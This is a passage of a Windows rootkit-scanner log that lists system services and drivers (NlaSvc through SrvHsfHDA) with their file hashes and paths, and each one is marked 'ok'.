12:17:08.0407 0x1aa8 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc C:\Windows\System32\nlasvc.dll
12:17:08.0429 0x1aa8 NlaSvc - ok
12:17:08.0434 0x1aa8 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\Windows\system32\drivers\Npfs.sys
12:17:08.0473 0x1aa8 Npfs - ok
12:17:08.0478 0x1aa8 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi C:\Windows\system32\nsisvc.dll
12:17:08.0514 0x1aa8 nsi - ok
12:17:08.0519 0x1aa8 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
12:17:08.0554 0x1aa8 nsiproxy - ok
12:17:08.0603 0x1aa8 [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
12:17:08.0662 0x1aa8 Ntfs - ok
12:17:08.0668 0x1aa8 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\Windows\system32\drivers\Null.sys
12:17:08.0709 0x1aa8 Null - ok
12:17:08.0724 0x1aa8 [ A85B4F2EF3A7304A5399EF0526423040, E45854691BA6AE36E53C2922CC93FF13DC2D84CBE7FE13A2F0B1CE1C16D1D158 ] NVENETFD C:\Windows\system32\DRIVERS\nvm62x64.sys
12:17:08.0752 0x1aa8 NVENETFD - ok
12:17:08.0762 0x1aa8 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\Windows\system32\drivers\nvraid.sys
12:17:08.0779 0x1aa8 nvraid - ok
12:17:08.0787 0x1aa8 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\Windows\system32\drivers\nvstor.sys
12:17:08.0803 0x1aa8 nvstor - ok
12:17:08.0811 0x1aa8 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
12:17:08.0826 0x1aa8 nv_agp - ok
12:17:08.0831 0x1aa8 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
12:17:08.0848 0x1aa8 ohci1394 - ok
12:17:08.0855 0x1aa8 [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
12:17:08.0869 0x1aa8 ose - ok
12:17:08.0993 0x1aa8 [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
12:17:09.0153 0x1aa8 osppsvc - ok
12:17:09.0174 0x1aa8 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\Windows\system32\pnrpsvc.dll
12:17:09.0199 0x1aa8 p2pimsvc - ok
12:17:09.0215 0x1aa8 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\Windows\system32\p2psvc.dll
12:17:09.0241 0x1aa8 p2psvc - ok
12:17:09.0248 0x1aa8 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\Windows\system32\drivers\parport.sys
12:17:09.0265 0x1aa8 Parport - ok
12:17:09.0271 0x1aa8 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\Windows\system32\drivers\partmgr.sys
12:17:09.0284 0x1aa8 partmgr - ok
12:17:09.0293 0x1aa8 [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc C:\Windows\System32\pcasvc.dll
12:17:09.0318 0x1aa8 PcaSvc - ok
12:17:09.0328 0x1aa8 [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci C:\Windows\system32\drivers\pci.sys
12:17:09.0345 0x1aa8 pci - ok
12:17:09.0349 0x1aa8 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\Windows\system32\drivers\pciide.sys
12:17:09.0361 0x1aa8 pciide - ok
12:17:09.0371 0x1aa8 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
12:17:09.0389 0x1aa8 pcmcia - ok
12:17:09.0394 0x1aa8 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\Windows\system32\drivers\pcw.sys
12:17:09.0407 0x1aa8 pcw - ok
12:17:09.0428 0x1aa8 [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH C:\Windows\system32\drivers\peauth.sys
12:17:09.0489 0x1aa8 PEAUTH - ok
12:17:09.0506 0x1aa8 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\Windows\SysWow64\perfhost.exe
12:17:09.0521 0x1aa8 PerfHost - ok
12:17:09.0567 0x1aa8 [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla C:\Windows\system32\pla.dll
12:17:09.0654 0x1aa8 pla - ok
12:17:09.0671 0x1aa8 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\Windows\system32\umpnpmgr.dll
12:17:09.0697 0x1aa8 PlugPlay - ok
12:17:09.0702 0x1aa8 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll
12:17:09.0716 0x1aa8 PNRPAutoReg - ok
12:17:09.0728 0x1aa8 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc C:\Windows\system32\pnrpsvc.dll
12:17:09.0749 0x1aa8 PNRPsvc - ok
12:17:09.0766 0x1aa8 [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
12:17:09.0821 0x1aa8 PolicyAgent - ok
12:17:09.0833 0x1aa8 [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power C:\Windows\system32\umpo.dll
12:17:09.0878 0x1aa8 Power - ok
12:17:09.0885 0x1aa8 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
12:17:09.0925 0x1aa8 PptpMiniport - ok
12:17:09.0930 0x1aa8 [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor C:\Windows\system32\drivers\processr.sys
12:17:09.0946 0x1aa8 Processor - ok
12:17:09.0956 0x1aa8 [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc C:\Windows\system32\profsvc.dll
12:17:09.0977 0x1aa8 ProfSvc - ok
12:17:09.0982 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
12:17:09.0995 0x1aa8 ProtectedStorage - ok
12:17:10.0003 0x1aa8 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched C:\Windows\system32\DRIVERS\pacer.sys
12:17:10.0042 0x1aa8 Psched - ok
12:17:10.0087 0x1aa8 [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
12:17:10.0141 0x1aa8 ql2300 - ok
12:17:10.0150 0x1aa8 [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
12:17:10.0165 0x1aa8 ql40xx - ok
12:17:10.0176 0x1aa8 [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE C:\Windows\system32\qwave.dll
12:17:10.0202 0x1aa8 QWAVE - ok
12:17:10.0207 0x1aa8 [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
12:17:10.0227 0x1aa8 QWAVEdrv - ok
12:17:10.0231 0x1aa8 [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
12:17:10.0267 0x1aa8 RasAcd - ok
12:17:10.0273 0x1aa8 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn C:\Windows\system32\DRIVERS\AgileVpn.sys
12:17:10.0310 0x1aa8 RasAgileVpn - ok
12:17:10.0316 0x1aa8 [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto C:\Windows\System32\rasauto.dll
12:17:10.0356 0x1aa8 RasAuto - ok
12:17:10.0363 0x1aa8 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
12:17:10.0401 0x1aa8 Rasl2tp - ok
12:17:10.0414 0x1aa8 [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan C:\Windows\System32\rasmans.dll
12:17:10.0460 0x1aa8 RasMan - ok
12:17:10.0467 0x1aa8 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
12:17:10.0506 0x1aa8 RasPppoe - ok
12:17:10.0511 0x1aa8 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
12:17:10.0549 0x1aa8 RasSstp - ok
12:17:10.0561 0x1aa8 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
12:17:10.0604 0x1aa8 rdbss - ok
12:17:10.0609 0x1aa8 [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus C:\Windows\system32\drivers\rdpbus.sys
12:17:10.0626 0x1aa8 rdpbus - ok
12:17:10.0629 0x1aa8 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
12:17:10.0668 0x1aa8 RDPCDD - ok
12:17:10.0673 0x1aa8 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
12:17:10.0709 0x1aa8 RDPENCDD - ok
12:17:10.0714 0x1aa8 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP C:\Windows\system32\drivers\rdprefmp.sys
12:17:10.0749 0x1aa8 RDPREFMP - ok
12:17:10.0755 0x1aa8 [ 313F68E1A3E6345A4F47A36B07062F34, B8318A0AE06BDE278931CA52F960B9FE226FD9894B076858DDB755AE26E1E66F ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
12:17:10.0769 0x1aa8 RdpVideoMiniport - ok
12:17:10.0779 0x1aa8 [ E61608AA35E98999AF9AAEEEA6114B0A, F754CDE89DC96786D2A3C4D19EE2AEF1008E634E4DE3C0CBF927436DE90C04A6 ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
12:17:10.0799 0x1aa8 RDPWD - ok
12:17:10.0808 0x1aa8 [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost C:\Windows\system32\drivers\rdyboost.sys
12:17:10.0825 0x1aa8 rdyboost - ok
12:17:10.0832 0x1aa8 [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess C:\Windows\System32\mprdim.dll
12:17:10.0879 0x1aa8 RemoteAccess - ok
12:17:10.0889 0x1aa8 [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry C:\Windows\system32\regsvc.dll
12:17:10.0942 0x1aa8 RemoteRegistry - ok
12:17:10.0950 0x1aa8 [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
12:17:10.0971 0x1aa8 RFCOMM - ok
12:17:10.0976 0x1aa8 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper C:\Windows\System32\RpcEpMap.dll
12:17:11.0017 0x1aa8 RpcEptMapper - ok
12:17:11.0020 0x1aa8 [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator C:\Windows\system32\locator.exe
12:17:11.0035 0x1aa8 RpcLocator - ok
12:17:11.0051 0x1aa8 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs C:\Windows\system32\rpcss.dll
12:17:11.0101 0x1aa8 RpcSs - ok
12:17:11.0115 0x1aa8 [ 6E5C3D18C3BCC72AA527DBC5FA61AB8F, DED50163906A86A55E299AAEE127B00EFCCEA7DF26AC962568C91935A13A1562 ] RSPCIESTOR C:\Windows\system32\DRIVERS\RtsPStor.sys
12:17:11.0135 0x1aa8 RSPCIESTOR - ok
12:17:11.0142 0x1aa8 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
12:17:11.0179 0x1aa8 rspndr - ok
12:17:11.0198 0x1aa8 [ 637646C63222E6ADCC19AF89983533E4, 9C40A2705FFC83012CF2C1D80F6DB53A07E86C94239406BE0C1EF1F0A3965844 ] RTL8167 C:\Windows\system32\DRIVERS\Rt64win7.sys
12:17:11.0220 0x1aa8 RTL8167 - ok
12:17:11.0225 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs C:\Windows\system32\lsass.exe
12:17:11.0238 0x1aa8 SamSs - ok
12:17:11.0244 0x1aa8 [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
12:17:11.0258 0x1aa8 sbp2port - ok
12:17:11.0267 0x1aa8 [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr C:\Windows\System32\SCardSvr.dll
12:17:11.0308 0x1aa8 SCardSvr - ok
12:17:11.0313 0x1aa8 [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter C:\Windows\system32\DRIVERS\scfilter.sys
12:17:11.0351 0x1aa8 scfilter - ok
12:17:11.0384 0x1aa8 [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule C:\Windows\system32\schedsvc.dll
12:17:11.0456 0x1aa8 Schedule - ok
12:17:11.0465 0x1aa8 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc C:\Windows\System32\certprop.dll
12:17:11.0503 0x1aa8 SCPolicySvc - ok
12:17:11.0510 0x1aa8 [ 111E0EBC0AD79CB0FA014B907B231CF0, B7D43D156C2524938503CF8E99C4D1F7A5C55E16C0368F57F4CD23C6D833B38F ] sdbus C:\Windows\system32\DRIVERS\sdbus.sys
12:17:11.0528 0x1aa8 sdbus - ok
12:17:11.0537 0x1aa8 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC C:\Windows\System32\SDRSVC.dll
12:17:11.0556 0x1aa8 SDRSVC - ok
12:17:11.0560 0x1aa8 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\Windows\system32\drivers\secdrv.sys
12:17:11.0600 0x1aa8 secdrv - ok
12:17:11.0604 0x1aa8 [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon C:\Windows\system32\seclogon.dll
12:17:11.0639 0x1aa8 seclogon - ok
12:17:11.0645 0x1aa8 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS C:\Windows\system32\sens.dll
12:17:11.0684 0x1aa8 SENS - ok
12:17:11.0689 0x1aa8 [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc C:\Windows\system32\sensrsvc.dll
12:17:11.0704 0x1aa8 SensrSvc - ok
12:17:11.0708 0x1aa8 [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum C:\Windows\system32\drivers\serenum.sys
12:17:11.0722 0x1aa8 Serenum - ok
12:17:11.0728 0x1aa8 [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial C:\Windows\system32\drivers\serial.sys
12:17:11.0745 0x1aa8 Serial - ok
12:17:11.0749 0x1aa8 [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse C:\Windows\system32\drivers\sermouse.sys
12:17:11.0764 0x1aa8 sermouse - ok
12:17:11.0777 0x1aa8 [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv C:\Windows\system32\sessenv.dll
12:17:11.0822 0x1aa8 SessionEnv - ok
12:17:11.0826 0x1aa8 [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
12:17:11.0843 0x1aa8 sffdisk - ok
12:17:11.0847 0x1aa8 [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
12:17:11.0863 0x1aa8 sffp_mmc - ok
12:17:11.0868 0x1aa8 [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
12:17:11.0885 0x1aa8 sffp_sd - ok
12:17:11.0889 0x1aa8 [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
12:17:11.0903 0x1aa8 sfloppy - ok
12:17:11.0929 0x1aa8 [ 2046AA7491DE7EFA4D70E615D9BC9D09, A8763D059AD68D5842C407FA9644E0B129BEF0F63CD87E62B80B05441EDC3489 ] Sftfs C:\Windows\system32\DRIVERS\Sftfslh.sys
12:17:11.0966 0x1aa8 Sftfs - ok
12:17:11.0987 0x1aa8 [ 77C5A741A7452812F278EF2C18478862, 0B763679EB7EFB8ED9DCE7B429706E939BB65BA6BCF1BAE0E0426D4E87074B8C ] sftlist C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
12:17:12.0016 0x1aa8 sftlist - ok
12:17:12.0029 0x1aa8 [ 0E0446BC4D51BE4263ACB7E33491191C, 2AD039FB440560658C4E06F67CC192EF71577EF3FF789A43C08430CE5EAE5A70 ] Sftplay C:\Windows\system32\DRIVERS\Sftplaylh.sys
12:17:12.0048 0x1aa8 Sftplay - ok
12:17:12.0052 0x1aa8 [ C5FB982CD266E604ED3142102C26D62C, A6BC0D72E98F924274ECAD49C85F0775D1CD45B97CD43F53DF3992B560835FC5 ] Sftredir C:\Windows\system32\DRIVERS\Sftredirlh.sys
12:17:12.0064 0x1aa8 Sftredir - ok
12:17:12.0068 0x1aa8 [ 2575511AF67AA1FA068CCC4918E2C2A3, 3152FF5AC2CF6FE966DA59B1B33E22F9BD9B6BB4310441870528364BA9501A4D ] Sftvol C:\Windows\system32\DRIVERS\Sftvollh.sys
12:17:12.0080 0x1aa8 Sftvol - ok
12:17:12.0089 0x1aa8 [ 39B1D0A636A400304565D4521FAD6D77, 1F01DB35B5A477AA7A77585C9304E6B5F3E67807531305BCA93A7F494CED8F59 ] sftvsa C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
12:17:12.0106 0x1aa8 sftvsa - ok
12:17:12.0120 0x1aa8 [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess C:\Windows\System32\ipnathlp.dll
12:17:12.0170 0x1aa8 SharedAccess - ok
12:17:12.0185 0x1aa8 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
12:17:12.0231 0x1aa8 ShellHWDetection - ok
12:17:12.0236 0x1aa8 [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2 C:\Windows\system32\drivers\SiSRaid2.sys
12:17:12.0249 0x1aa8 SiSRaid2 - ok
12:17:12.0255 0x1aa8 [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
12:17:12.0269 0x1aa8 SiSRaid4 - ok
12:17:12.0278 0x1aa8 [ 50D9949020E02B847CD48F1243FCB895, 5BDAD5E44DE5B412645142810C5FCE4B2D9685F928FF4A6B836A9DCE7725BD78 ] SkypeUpdate C:\Program Files (x86)\Skype\Updater\Updater.exe
12:17:12.0294 0x1aa8 SkypeUpdate - ok
12:17:12.0300 0x1aa8 [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb C:\Windows\system32\DRIVERS\smb.sys
12:17:12.0341 0x1aa8 Smb - ok
12:17:12.0349 0x1aa8 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
12:17:12.0365 0x1aa8 SNMPTRAP - ok
12:17:12.0369 0x1aa8 [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr C:\Windows\system32\drivers\spldr.sys
12:17:12.0381 0x1aa8 spldr - ok
12:17:12.0400 0x1aa8 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler C:\Windows\System32\spoolsv.exe
12:17:12.0431 0x1aa8 Spooler - ok
12:17:12.0523 0x1aa8 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc C:\Windows\system32\sppsvc.exe
12:17:12.0676 0x1aa8 sppsvc - ok
12:17:12.0686 0x1aa8 [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify C:\Windows\system32\sppuinotify.dll
12:17:12.0723 0x1aa8 sppuinotify - ok
12:17:12.0753 0x1aa8 [ F718A57D946EAC76EFCB351D74E269F4, 473AE48BACEE64A9582814951B731BDDDEB48D2E9D407ACEAA3F0850B536DABA ] SRTSP C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS
12:17:12.0787 0x1aa8 SRTSP - ok
12:17:12.0792 0x1aa8 [ B18CE01B9C09C59422BA7C7064248B35, B355EE2FBB37C4B0EFFE4DC5E0788A26579266828E7988EDC497B0AE7375F8AB ] SRTSPX C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS
12:17:12.0803 0x1aa8 SRTSPX - ok
12:17:12.0820 0x1aa8 [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv C:\Windows\system32\DRIVERS\srv.sys
12:17:12.0848 0x1aa8 srv - ok
12:17:12.0864 0x1aa8 [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
12:17:12.0889 0x1aa8 srv2 - ok
12:17:12.0901 0x1aa8 [ 0C4540311E11664B245A263E1154CEF8, 63376322BFFAFF2F166AF3FDD3F1A346C21FAE21F406F659F8630779D1D6525D ] SrvHsfHDA C:\Windows\system32\DRIVERS\VSTAZL6.SYS
12:17:12.0923 0x1aa8 SrvHsfHDA - ok
